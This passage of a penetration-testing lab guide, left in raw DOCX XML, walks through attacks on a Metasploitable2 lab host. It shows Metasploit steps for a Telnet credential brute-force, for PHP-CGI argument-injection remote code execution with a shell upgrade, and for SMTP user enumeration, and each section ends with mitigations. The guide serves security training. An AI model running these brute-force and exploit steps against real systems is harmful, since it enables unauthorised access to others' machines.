        <w:t xml:space="preserve">Select the module and review its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72</w:t>
            </w:r>
          </w:p>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Configure the target and credential wordlists.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192.168.228.130</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">set PASS_FILE /home/kali/pass.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">set USER_FILE /home/kali/user.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure success/verbosity behavior and run the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STOP_ON_SUCCESS true</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">set VERBOSE true</w:t>
            </w:r>
          </w:p>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List the active session created upon successful credential discovery.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sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Interact with the session.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sessions -i 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Alternatively, open a separate terminal and authenticate manually with the recovered credentials to confirm access via the standard telnet client, reinforcing that the underlying weakness is credential/encryption based rather than a software exploit.</w:t>
      </w:r>
    </w:p>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telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Locate Telnet-related Metasploit modules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use 72</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Select the telnet_login auxiliary module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PASS_FILE / USER_FILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Supply brute-force wordlists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set STOP_ON_SUCCESS true / VERBOSE true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Control brute-force behavior and logging</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show sessions / sessions -i &lt;n&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">List and interact with opened sessions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telnet &lt;ip&gt; 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Manually connect using recovered credentials</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Disable and remove the Telnet service entirely on production systems; replace with SSH for all remote administration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If legacy equipment requires Telnet, isolate it on a dedicated, tightly firewalled management VLAN with no route to untrusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce strong, unique credentials and monitor for repeated authentication failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use network monitoring/IDS to flag any Telnet traffic on the network as a policy violation, since its plaintext nature makes it inherently unsuitable for sensitive environments.</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The practical risk difference between an encrypted (SSH) and unencrypted (Telnet) remote-access protocol.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeatable application of the Metasploit brute-force workflow across different protocol modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why legacy/plaintext protocols remain common findings in real-world penetration tests despite modern alternatives being available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId15"/>
          <w:footerReference w:type="default" r:id="rId16"/>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4: HTTP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Apache 2.2.8 with PHP 5.4.2 (CGI)</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TCP/80</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PHP-CGI Argument Injection Remote Code Execution (related to CVE-2012-1823)</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Critical — unauthenticated remote code execution</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HTTP is the foundation of web communication between clients and servers. Because standard HTTP transmits data in plaintext and web applications frequently contain implementation flaws, it is one of the richest sources of exploitable vulnerabilities in any environment. On Metasploitable2, the bundled Apache/PHP stack is vulnerable to a well-known PHP-CGI argument injection flaw that allows remote code execution.</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When PHP is configured to run via CGI, certain command-line arguments can be injected through crafted query-string parameters, allowing an attacker to alter PHP's own interpreter behavior — for example, forcing it to execute arbitrary PHP source. Combined with the outdated Apache 2.2.8 and PHP 5.4.2 versions running on Metasploitable2, this results in full unauthenticated remote code execution.</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Identify the attacker's own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ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover the target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netdiscover -r 192.168.64.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan for open ports and confirm the web service and its version.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192.168.64.130 192.168.64.254</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Launch Metasploit and confirm the HTTP service version using an HTTP version-detection auxiliary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tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for and select the HTTP version detection module, then configure and run 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http_version</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">use 0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">show options</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">set rhosts 192.168.64.130</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In a separate terminal, cross-reference the identified Apache version against known exploits.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searchsploit Apache 2.2.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search Metasploit for the PHP 5.4.2 CGI argument-injection exploit corresponding to the identified PHP version.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php 5.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the CGI argument-injection payload module and review its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1</w:t>
            </w:r>
          </w:p>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Configure the target host and run the exploit.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192.168.64.130</w:t>
            </w:r>
          </w:p>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Once a Meterpreter session is established, drop to a raw command shell.</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shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade the shell to a fully interactive TTY for usability.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python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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http_version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Locate the HTTP version-detection auxiliary module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searchsploit Apache 2.2.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-reference Apache version against known Exploit-DB entries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php 5.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Locate the matching PHP-CGI Metasploit exploit module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use 1 / show options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Select the CGI argument-injection module and view required settings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rhosts &lt;ip&gt; / exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Configure the target and launch the exploit</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shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Drop from a Meterpreter session into a native command shell</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Patch Apache and PHP to current, supported versions; the PHP-CGI argument-injection class of vulnerability is fixed in updated PHP releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid running PHP via CGI where possible; prefer PHP-FPM with a properly configured web server, which is not subject to this argument-injection class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the principle of least privilege to the web server process so that even a successful RCE has minimal blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy a Web Application Firewall (WAF) to detect and block anomalous query-string patterns associated with CGI argument injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly scan externally facing web services for outdated software versions as part of a continuous vulnerability management program.</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How outdated web server and interpreter versions combine to create a critical, unauthenticated RCE path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The difference between an auxiliary (information-gathering) module and an exploit module in Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Transitioning from a Meterpreter session to a native shell using the shell command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId17"/>
          <w:footerReference w:type="default" r:id="rId18"/>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5: SMTP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SMTP (Postfix/Sendmail on Metasploitable2)</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TCP/25</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SMTP user enumeration (VRFY/EXPN) and potential open-relay misconfiguration</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Medium — information disclosure supporting further attacks (e.g., targeted credential attacks)</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SMTP (Simple Mail Transfer Protocol) is used to send email across the internet. Common SMTP weaknesses include open relay configurations that allow spammers to route mail through the server, lack of transport encryption, weak authentication, and poor input validation enabling injection or enumeration attacks. This module focuses on enumerating valid usernames on the SMTP service and confirming relay behavior.</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Many SMTP daemons support the VRFY and EXPN commands, which were originally intended to let administrators verify mailbox names. Left enabled, they allow any remote, unauthenticated client to enumerate valid system usernames — information that materially assists follow-on credential or phishing attacks. Additionally, an improperly restricted RCPT TO/relay configuration can allow the server to be abused for mail relay.</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Identify the attacker's own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ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover the target IP address.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netdiscover -r 192.168.64.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan for open ports and confirm SMTP (port 25) is exposed.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192.168.64.130 192.168.64.254</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Launch Metasploit.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tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for SMTP-related modules and identify the SMTP user enumeration module (smtp_enum).</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smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the module (module index 41 in this walkthrough).</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41</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review required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Set the target host.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192.168.64.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the module to enumerate valid mailbox/user names.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In a separate terminal, connect directly to the SMTP service via Telnet to manually verify relay behavior by issuing RCPT TO commands and observing whether the server accepts mail for external, unauthenticated relay.</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telnet 192.168.148.129 25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Locate SMTP-related Metasploit modules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use 41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Select the smtp_enum auxiliary module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rhosts &lt;ip&gt; / exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Configure target and run username enumeration</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telnet &lt;ip&gt; 25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Manually interact with the SMTP service to test relay/VRFY behavior</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Disable VRFY and EXPN commands, or configure the SMTP daemon to return generic, non-confirming responses to enumeration attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicitly restrict relay permissions to authenticated, trusted senders only; regularly audit relay configuration to prevent it from being used for spam.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
